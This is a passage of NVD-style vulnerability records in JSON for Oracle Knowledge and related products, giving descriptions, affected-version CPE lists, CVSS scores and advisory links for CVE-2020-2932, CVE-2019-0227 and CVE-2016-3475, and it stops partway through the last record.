Vulnerabilites related to oracle - knowledge
Vulnerability from fkie_nvd
Published
2020-04-15 14:15
Modified
2024-11-21 05:26
Severity ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9E587602-BA7D-4087-BE29-ACE0B01BD590",
"versionEndIncluding": "8.6.3",
"versionStartIncluding": "8.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)."
},
{
"lang": "es",
"value": "Vulnerabilidad en el producto Oracle Knowledge de Oracle Knowledge (componente: Information Manager Console). Las versiones compatibles que est\u00e1n afectadas son 8.6.0-8.6.3. Una vulnerabilidad dif\u00edcil de explotar permite a un atacante no autenticado con acceso a la red por medio de HTTP comprometer a Oracle Knowledge. Los ataques con \u00e9xito de esta vulnerabilidad pueden resultar en la capacidad no autorizada de causar una suspensi\u00f3n o bloqueo repetible frecuentemente (DOS completa) de Oracle Knowledge. CVSS 3.0 Puntuaci\u00f3n Base 5.9 (Impactos de la disponibilidad). Vector CVSS: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)."
}
],
"id": "CVE-2020-2932",
"lastModified": "2024-11-21T05:26:39.897",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "secalert_us@oracle.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-15T14:15:36.310",
"references": [
{
"source": "secalert_us@oracle.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"sourceIdentifier": "secalert_us@oracle.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-05-01 21:29
Modified
2024-11-21 04:16
Severity ?
Summary
A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:axis:1.4:*:*:*:*:*:*:*",
"matchCriteriaId": "23200FEC-5AD3-42A1-9161-1F8BBBA11E38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:agile_engineering_data_management:6.2.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "80C9DBB8-3D50-4D5D-859A-B022EB7C2E64",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:agile_product_lifecycle_management_framework:9.3.3:*:*:*:*:*:*:*",
"matchCriteriaId": "8454A130-2E9B-4528-A24D-1B3D0FFCC860",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "10F17843-32EA-4C31-B65C-F424447BEF7B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A125E817-F974-4509-872C-B71933F42AD1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:*",
"matchCriteriaId": "8C4C38FF-B75B-4DF1-BFB3-C91BDD10D90E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_asap_cartridges:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "D4CE3535-FC9D-4FB2-8739-19E7477B07FF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_asap_cartridges:7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "58A06A98-0374-4B56-9045-D939F30BF479",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_design_studio:7.3.4.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "313F42E5-1BBB-4773-A153-B114C3FDF701",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_design_studio:7.3.5.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AC75FE72-6C3F-428E-9C9A-60982455238B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_design_studio:7.4.0.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B370B017-2E3B-438B-86B9-EEF70E3A5D3A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_design_studio:7.4.1.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "63C81E5E-3C53-4731-96C3-0F5767874B11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_element_manager:8.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "ED5503EC-63B6-47EB-AE37-14DD317DDDD8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_element_manager:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A99F85F8-F374-48B0-9534-BB9C07AFE76E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0C57FD3A-0CC1-4BA9-879A-8C4A40234162",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "698FB6D0-B26F-4760-9B9B-1C65FBFF2126",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_network_integrity:7.3.5:*:*:*:*:*:*:*",
"matchCriteriaId": "FB92D8A7-2ABD-4B70-A32C-4B6B866C5B8B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*",
"matchCriteriaId": "B21E6EEF-2AB7-4E96-B092-1F49D11B4175",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_order_and_service_management:7.3.0.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DB472856-38AB-4062-B752-E204B177DE72",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_order_and_service_management:7.4:*:*:*:*:*:*:*",
"matchCriteriaId": "1F015E20-7886-4713-B4EC-FE7894066D09",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_report_manager:8.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7DDF6809-53A7-4F7D-9FA8-B522BE8F7A21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_report_manager:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AA86A15F-FAB8-4DF5-95AC-DA3D1CF7A720",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "DB43DFD4-D058-4001-BD19-488E059F4532",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "086E2E5C-44EB-4C07-B298-C04189533996",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_route_manager:8.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4B042935-BC42-4CA8-9379-7F0F894F9653",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_route_manager:8.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "3B374F86-4EC8-4797-A8C3-5C1FF1DFC9F8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "5682DAEB-3810-4541-833A-568C868BCE0B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "01BC9AED-F81D-4344-AD97-EEF19B6EA8C7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9D03A8C9-35A5-4B75-9711-7A4A60457307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5:*:*:*:*:*:*:*",
"matchCriteriaId": "36E39918-B2D6-43F0-A607-8FD8BFF6F340",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7582B307-3899-4BBB-B868-BC912A4D0109",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:12.1.0.5:*:*:*:*:*:*:*",
"matchCriteriaId": "14480702-4398-4C28-82A6-E7329FB3B650",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B5BC32AA-78BE-468B-B92A-5A0FFFA970FA",
"versionEndIncluding": "7.3.5",
"versionStartIncluding": "7.3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F6E8C634-FC3E-418F-8D7D-B71E1A3E2DBE",
"versionEndIncluding": "8.0.8",
"versionStartIncluding": "8.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_compliance_regulatory_reporting:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1DDD1A52-5794-4837-847C-E5F073330774",
"versionEndIncluding": "8.0.8",
"versionStartIncluding": "8.0.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:*",
"matchCriteriaId": "547D042E-51DE-430D-B4BA-F0698646BC80",
"versionEndIncluding": "8.0.7",
"versionStartIncluding": "8.0.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_core_banking:11.7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "87416B3B-3B2B-486B-B931-19199EF07000",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_core_banking:11.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1102B6BC-D99E-4AC0-9375-FB8517A4A71F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_core_banking:11.9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4D22386C-FEC4-4984-8E2A-8FE4796BEFBE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_core_banking:11.10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B283B614-9E31-4148-8688-B0672B3A77B3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6762F207-93C7-4363-B2F9-7A7C6F8AF993",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1B74B912-152D-4F38-9FC1-741D6D0B27FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1A3DC116-2844-47A1-BEC2-D0675DD97148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E0F1DF3E-0F2D-4EFC-9A3E-F72149C8AE94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*",
"matchCriteriaId": "82EA4BA7-C38B-4AF3-8914-9E3D089EBDD4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*",
"matchCriteriaId": "B9C9BC66-FA5F-4774-9BDA-7AB88E2839C4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7F69B9A5-F21B-4904-9F27-95C0F7A628E3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:internet_directory:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "68F2A706-3250-4026-9498-CB4B38B23CEC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:internet_directory:12.2.1.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7360EC9B-814F-4FF5-AA9D-9E55A380B2C5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9E587602-BA7D-4087-BE29-ACE0B01BD590",
"versionEndIncluding": "8.6.3",
"versionStartIncluding": "8.6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_human_capital_management_human_resources:7.3.5:*:*:*:*:*:*:*",
"matchCriteriaId": "4E4BF4AC-3470-490E-B8FB-E072743D074A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_human_capital_management_human_resources:7.3.6:*:*:*:*:*:*:*",
"matchCriteriaId": "DD46F1BE-BDDC-43A5-87C5-BFB693673489",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_human_capital_management_human_resources:9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "344A3A9E-3113-4096-B9F8-CA0AD705242B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*",
"matchCriteriaId": "D0A735B4-4F3C-416B-8C08-9CB21BAD2889",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*",
"matchCriteriaId": "7E1E416B-920B-49A0-9523-382898C2979D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*",
"matchCriteriaId": "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "0DB5E2C7-9C68-4D3B-95AD-9CBF65DE1E94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:16.2.11:*:*:*:*:*:*:*",
"matchCriteriaId": "1DFB9704-6B99-4113-8537-E4AE0F791B86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:17.12.6:*:*:*:*:*:*:*",
"matchCriteriaId": "2F5647E5-B051-41A6-B186-3584C725908B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9",
"versionEndIncluding": "17.12",
"versionStartIncluding": "17.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*",
"matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*",
"matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*",
"matchCriteriaId": "10864586-270E-4ACF-BDCC-ECFCD299305F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:rapid_planning:12.1:*:*:*:*:*:*:*",
"matchCriteriaId": "19A0F1AF-F2E6-44E7-8E2D-190E103B72D3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:rapid_planning:12.2:*:*:*:*:*:*:*",
"matchCriteriaId": "6D53690D-3390-4A27-988A-709CD89DD05B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:real-time_decision_server:3.2.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DD2288B1-FF5E-46BC-8551-4CC6B046A0D0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_order_broker:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EE8CF045-09BB-4069-BCEC-496D5AE3B780",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_order_broker:16.0:*:*:*:*:*:*:*",
"matchCriteriaId": "38E74E68-7F19-4EF3-AC00-3C249EAAA39E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_order_broker:18.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0783F0D1-8FAC-4BCA-A6F5-C5C60E86D56D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A0ED83E3-E6BF-4EAA-AF8F-33485A88A218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:secure_global_desktop:5.4:*:*:*:*:*:*:*",
"matchCriteriaId": "B5265C91-FF5C-4451-A7C2-D388A65ACFA2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:secure_global_desktop:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "C2B933E8-DBC4-4443-B837-BA8BAF8CC249",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:siebel_ui_framework:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EAC9E8DC-5139-4420-9BD6-0B5F2FA3150E",
"versionEndIncluding": "21.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:tuxedo:12.1.1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "92A6A7BA-CCE6-426F-8434-7A578A245180",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:tuxedo:12.1.3:*:*:*:*:*:*:*",
"matchCriteriaId": "BBC28867-E828-4ABC-BE7B-3E5C2E826879",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6A4F71A-4269-40FC-8F61-1D1301F2B728",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue."
},
{
"lang": "es",
"value": "Una vulnerabilidad de tipo SSRF (Server Side Request Forgery) afect\u00f3 a la distribuci\u00f3n de Apache Axis 1.4 que fue lanzada por \u00faltima vez en 2006. La seguridad y las confirmaciones de errores contin\u00faan en el repositorio de Subversion de Axis 1.x, se anima a los usuarios a construir desde el c\u00f3digo fuente. El sucesor de Axis 1.x es Axis2, la \u00faltima versi\u00f3n es 1.7.9 y no es vulnerable a este problema."
}
],
"id": "CVE-2019-0227",
"lastModified": "2024-11-21T04:16:32.373",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 5.5,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-05-01T21:29:00.643",
"references": [
{
"source": "security@apache.org",
"url": "https://lists.apache.org/thread.html/r3a5baf5d76f1f2181be7f54da3deab70d7a38b5660b387583d05a8cd%40%3Cjava-user.axis.apache.org%3E"
},
{
"source": "security@apache.org",
"url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E"
},
{
"source": "security@apache.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://rhinosecuritylabs.com/application-security/cve-2019-0227-expired-domain-rce-apache-axis/"
},
{
"source": "security@apache.org",
"url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
},
{
"source": "security@apache.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"source": "security@apache.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "security@apache.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "security@apache.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"source": "security@apache.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"source": "security@apache.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"source": "security@apache.org",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"source": "security@apache.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"source": "security@apache.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.apache.org/thread.html/r3a5baf5d76f1f2181be7f54da3deab70d7a38b5660b387583d05a8cd%40%3Cjava-user.axis.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://rhinosecuritylabs.com/application-security/cve-2019-0227-expired-domain-rce-apache-axis/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-07-21 10:12
Modified
2024-11-21 02:50
Severity ?
Summary
Unspecified vulnerability in the Oracle Knowledge component in Oracle Siebel CRM 8.5.x allows remote authenticated users to affect confidentiality via vectors related to Information Manager Console.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:knowledge:8.5:*:*:*:*:*:*:*",
"matchCriteriaId": "5AC44080-61DA-4E64-8D6B-991D53F171FE",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the Oracle Knowledge component in Oracle Siebel CRM 8.5.x allows remote authenticated users to affect confidentiality via vectors related to Information Manager Console."
},
{
"lang": "es",
"value": "Vulnerabilidad no especificada en el componente Oracle Knowledge en Oracle Siebel CRM 8.5.x permite a usuarios remotos autenticados afectar la confidencialidad a trav\u00e9s de vectores relacionados con Information Manager Console."
}
],
"id": "CVE-2016-3475",
"lastModified": "2024-11-21T02:50:05.120",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": true,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.0,
